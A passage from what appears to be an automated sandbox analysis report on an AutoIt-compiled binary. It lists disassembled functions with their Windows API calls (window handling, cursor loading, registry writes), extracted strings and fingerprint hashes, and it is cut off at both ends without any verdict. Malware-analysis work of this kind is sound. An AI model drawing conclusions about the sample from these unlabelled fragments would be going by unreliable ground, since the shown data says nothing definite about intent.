                                                                                  • Part of subcall function 003CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 003CB66C
                                                                                  • Part of subcall function 003CB63C: GetAsyncKeyState.USER32(00000001), ref: 003CB691
                                                                                  • Part of subcall function 003CB63C: GetAsyncKeyState.USER32(00000002), ref: 003CB69F
                                                                                • SetTimer.USER32(00000000,00000000,00000028,003CAB87), ref: 003CAA79
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: 6eba332e20c3fd53923ce1bf61ba051d32b6032547fcb308ff37f2a12aefacf3
                                                                                • Instruction ID: 3873e3b00e383e986b438c2f6df6c9fc681e8e562f00b7cb7aa07258c8929f32
                                                                                • Opcode Fuzzy Hash: 6eba332e20c3fd53923ce1bf61ba051d32b6032547fcb308ff37f2a12aefacf3
                                                                                • Instruction Fuzzy Hash: 2CB14C75A0020AAFDB15DFA8DC46FAE7BB4FB08314F114229FA15E62A0DB749C41CB59
                                                                                Function 00413639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00413735
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0044DC00,00000000,?,00000000,?,?), ref: 004137A3
                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004137EB
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00413874
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00413B94
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00413BA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 536824911-966354055
                                                                                • Opcode ID: 06ce6629ed61712d2e3dc99a974dd338f1e33fae0041bd5a4bb11d17f4553433
                                                                                • Instruction ID: 812224f3a980806d77a56b817e9143a7d17883c4c0a337b71f42d977f0424e5a
                                                                                • Opcode Fuzzy Hash: 06ce6629ed61712d2e3dc99a974dd338f1e33fae0041bd5a4bb11d17f4553433
                                                                                • Instruction Fuzzy Hash: 800289756046019FCB15EF24C841E6AB7E5FF88724F04845EFA8A9B3A2DB34ED41CB85
                                                                                Function 00416BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 00416C56
                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00416D16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                • API String ID: 3974292440-719923060
                                                                                • Opcode ID: df3ad9eb38b0712d19b6bed54dd6d42d1a84818b430ff14a7305d9d7f1a67e8f
                                                                                • Instruction ID: 807f143f8533ecce4effd69e2f23a34a94e0bc90dde37e4650c3aeb38caf62c0
                                                                                • Opcode Fuzzy Hash: df3ad9eb38b0712d19b6bed54dd6d42d1a84818b430ff14a7305d9d7f1a67e8f
                                                                                • Instruction Fuzzy Hash: B7A181302043419BCB15EF24C952AABB3A5BF84314F11896EF9569F3D2EB34EC46CB46
                                                                                Function 003ECF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 003ECF91
                                                                                • __swprintf.LIBCMT ref: 003ED032
                                                                                • _wcscmp.LIBCMT ref: 003ED045
                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003ED09A
                                                                                • _wcscmp.LIBCMT ref: 003ED0D6
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 003ED10D
                                                                                • GetDlgCtrlID.USER32(?), ref: 003ED15F
                                                                                • GetWindowRect.USER32(?,?), ref: 003ED195
                                                                                • GetParent.USER32(?), ref: 003ED1B3
                                                                                • ScreenToClient.USER32(00000000), ref: 003ED1BA
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 003ED234
                                                                                • _wcscmp.LIBCMT ref: 003ED248
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 003ED26E
                                                                                • _wcscmp.LIBCMT ref: 003ED282
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                • String ID: %s%u
                                                                                • API String ID: 3119225716-679674701
                                                                                • Opcode ID: 58e53a7899553bb1771003a0acc777b839a2790d402587277d4f19eabe996470
                                                                                • Instruction ID: 36f250973049bbf3e825d2ea66174b224e7be65bdaf9bd2d67fc95e9fbcee420
                                                                                • Opcode Fuzzy Hash: 58e53a7899553bb1771003a0acc777b839a2790d402587277d4f19eabe996470
                                                                                • Instruction Fuzzy Hash: 38A1F531604356AFD716DF65D884FAAB7A8FF44314F008A2AFA69D61C0D730EA06CB91
                                                                                Function 003ED8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 003ED8EB
                                                                                • _wcscmp.LIBCMT ref: 003ED8FC
                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 003ED924
                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 003ED941
                                                                                • _wcscmp.LIBCMT ref: 003ED95F
                                                                                • _wcsstr.LIBCMT ref: 003ED970
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 003ED9A8
                                                                                • _wcscmp.LIBCMT ref: 003ED9B8
                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 003ED9DF
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 003EDA28
                                                                                • _wcscmp.LIBCMT ref: 003EDA38
                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 003EDA60
                                                                                • GetWindowRect.USER32(00000004,?), ref: 003EDAC9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                • String ID: @$ThumbnailClass
                                                                                • API String ID: 1788623398-1539354611
                                                                                • Opcode ID: 152ab641628a01252efb0e682ca0e03b01e0a544465fb4a44f540d809b0410b9
                                                                                • Instruction ID: 91b59e14f8b92cdb946156af3366699af6536a125b03623c2d1ed285c95b0608
                                                                                • Opcode Fuzzy Hash: 152ab641628a01252efb0e682ca0e03b01e0a544465fb4a44f540d809b0410b9
                                                                                • Instruction Fuzzy Hash: 3F81C2310083959FDB12DF11D881FAA7BE8EF84314F04466AFD899A0D6EB34DE45CBA1
                                                                                Function 003ED6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                • API String ID: 1038674560-1810252412
                                                                                • Opcode ID: 22df64b8fa5a8aa24e4487880b7887bd07e4effc4f6812f3a9fe581df988a4fb
                                                                                • Instruction ID: 56f2d690d4703e268e077677e508d16383187b6cdecbe6f2ceb8b0390aab95ec
                                                                                • Opcode Fuzzy Hash: 22df64b8fa5a8aa24e4487880b7887bd07e4effc4f6812f3a9fe581df988a4fb
                                                                                • Instruction Fuzzy Hash: A231DE32A04655B6EB16EF11DE43FED73689F20B44F30022AF541794D2FB95AA00C616
                                                                                Function 003EEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadIconW.USER32(00000063), ref: 003EEAB0
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003EEAC2
                                                                                • SetWindowTextW.USER32(?,?), ref: 003EEAD9
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 003EEAEE
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 003EEAF4
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 003EEB04
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 003EEB0A
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003EEB2B
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003EEB45
                                                                                • GetWindowRect.USER32(?,?), ref: 003EEB4E
                                                                                • SetWindowTextW.USER32(?,?), ref: 003EEBB9
                                                                                • GetDesktopWindow.USER32 ref: 003EEBBF
                                                                                • GetWindowRect.USER32(00000000), ref: 003EEBC6
                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 003EEC12
                                                                                • GetClientRect.USER32(?,?), ref: 003EEC1F
                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 003EEC44
                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003EEC6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                • String ID:
                                                                                • API String ID: 3869813825-0
                                                                                • Opcode ID: 717e6e99d18739ff3800109b3516c029b6124dbee4e68af671bee25279662da1
                                                                                • Instruction ID: cf7a847b51318f5e3dc349419e0ae746aabcdc586173336af89f171148acd6c8
                                                                                • Opcode Fuzzy Hash: 717e6e99d18739ff3800109b3516c029b6124dbee4e68af671bee25279662da1
                                                                                • Instruction Fuzzy Hash: 11517D7190074AEFDB21DFA9DD8AF6EBBF5FF04704F004A28E596A25A0D774A944CB04
                                                                                Function 004079B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 004079C6
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004079D1
                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 004079DC
                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 004079E7
                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004079F2
                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 004079FD
                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00407A08
                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00407A13
                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00407A1E
                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00407A29
                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00407A34
                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00407A3F
                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00407A4A
                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00407A55
                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00407A60
                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00407A6B
                                                                                • GetCursorInfo.USER32(?), ref: 00407A7B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$Load$Info
                                                                                • String ID:
                                                                                • API String ID: 2577412497-0
                                                                                • Opcode ID: 1f6d0955f1c33ead8adf781fa44914e6665cc5c2114ffe336088c986207c2f3a
                                                                                • Instruction ID: 7e87b9cd26d4f9f95775bed50ffbcabe0ba05713d37a52458bec0d345c592eed
                                                                                • Opcode Fuzzy Hash: 1f6d0955f1c33ead8adf781fa44914e6665cc5c2114ffe336088c986207c2f3a
                                                                                • Instruction Fuzzy Hash: E23112B0E0831A6ADB109FB68C8995FBEE8FF04750F50453BA50DF7280DA7CA5008FA5
                                                                                Function 003BC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,003BC8B7,?,00002000,?,?,00000000,?,003B419E,?,?,?,0044DC00), ref: 003CE984
                                                                                  • Part of subcall function 003B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B53B1,?,?,003B61FF,?,00000000,00000001,00000000), ref: 003B662F
                                                                                • __wsplitpath.LIBCMT ref: 003BC93E
                                                                                  • Part of subcall function 003D1DFC: __wsplitpath_helper.LIBCMT ref: 003D1E3C
                                                                                • _wcscpy.LIBCMT ref: 003BC953
                                                                                • _wcscat.LIBCMT ref: 003BC968
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 003BC978
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003BCABE
                                                                                  • Part of subcall function 003BB337: _wcscpy.LIBCMT ref: 003BB36F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                • API String ID: 2258743419-1018226102
                                                                                • Opcode ID: 5c9ba8842a77236dcd9fcc5cfa73fc862f57fadff2cb98c9ba72d8a8251f2b17
                                                                                • Instruction ID: 7ec620d781dd85287dbdc196ad8af54d8d3c9e2ca45ba01b0357ad38e0b9c9db
                                                                                • Opcode Fuzzy Hash: 5c9ba8842a77236dcd9fcc5cfa73fc862f57fadff2cb98c9ba72d8a8251f2b17
                                                                                • Instruction Fuzzy Hash: 5F12CE715083419FC726EF24C881AAFBBF5BF89304F40491EF6899B252DB34DA49CB56
                                                                                Function 0041CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0041CEFB
                                                                                • DestroyWindow.USER32(?,?), ref: 0041CF73
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0041CFF4
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0041D016
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041D025
                                                                                • DestroyWindow.USER32(?), ref: 0041D042
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003B0000,00000000), ref: 0041D075
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041D094
                                                                                • GetDesktopWindow.USER32 ref: 0041D0A9
                                                                                • GetWindowRect.USER32(00000000), ref: 0041D0B0
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0041D0C2
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0041D0DA
                                                                                  • Part of subcall function 003CB526: GetWindowLongW.USER32(?,000000EB), ref: 003CB537
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 3877571568-3619404913
                                                                                • Opcode ID: 02ac8ecce551000bc040eb7926f7a99e044b502303f5597294334d216c76b8a0
                                                                                • Instruction ID: ecaa2e2396f3a1236f65be721354b31261de40403b5520b25577f525b140a93d
                                                                                • Opcode Fuzzy Hash: 02ac8ecce551000bc040eb7926f7a99e044b502303f5597294334d216c76b8a0
                                                                                • Instruction Fuzzy Hash: 82719FB4650305AFD721CF28CC85FA67BE5EB88708F14451EF985872A1D778E982CB1A
                                                                                Function 0041F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0041F37A
                                                                                  • Part of subcall function 0041D7DE: ClientToScreen.USER32(?,?), ref: 0041D807
                                                                                  • Part of subcall function 0041D7DE: GetWindowRect.USER32(?,?), ref: 0041D87D
                                                                                  • Part of subcall function 0041D7DE: PtInRect.USER32(?,?,0041ED5A), ref: 0041D88D
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0041F3E3
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0041F3EE
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0041F411
                                                                                • _wcscat.LIBCMT ref: 0041F441
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0041F458
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0041F471
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0041F488
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0041F4AA
                                                                                • DragFinish.SHELL32(?), ref: 0041F4B1
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0041F59C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                • API String ID: 169749273-3440237614
                                                                                • Opcode ID: 6908ecfd5f75a93bca34b265e2b500f47ba4b6f4a4c3ef5044b8ff6881e2a421
                                                                                • Instruction ID: 4aaa901d1d0b51a1615de76e9e0bef4f3c883d66f11ead2e6e4d75e0b32d2bf3
                                                                                • Opcode Fuzzy Hash: 6908ecfd5f75a93bca34b265e2b500f47ba4b6f4a4c3ef5044b8ff6881e2a421
                                                                                • Instruction Fuzzy Hash: 6E615771508300AFC311EF64DC86E9FBBF8BF88714F004A2EF695961A1DB749A49CB56
                                                                                Function 003FAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000000), ref: 003FAB3D
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 003FAB46
                                                                                • VariantClear.OLEAUT32(?), ref: 003FAB52
                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003FAC40
                                                                                • __swprintf.LIBCMT ref: 003FAC70
                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 003FAC9C
                                                                                • VariantInit.OLEAUT32(?), ref: 003FAD4D
                                                                                • SysFreeString.OLEAUT32(00000016), ref: 003FADDF
                                                                                • VariantClear.OLEAUT32(?), ref: 003FAE35
                                                                                • VariantClear.OLEAUT32(?), ref: 003FAE44
                                                                                • VariantInit.OLEAUT32(00000000), ref: 003FAE80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 3730832054-3931177956
                                                                                • Opcode ID: cfb3c696f6b5f99e4c748fde186aa8ccb5626cd47e1b4fb5fc0b286cabdc9a4b
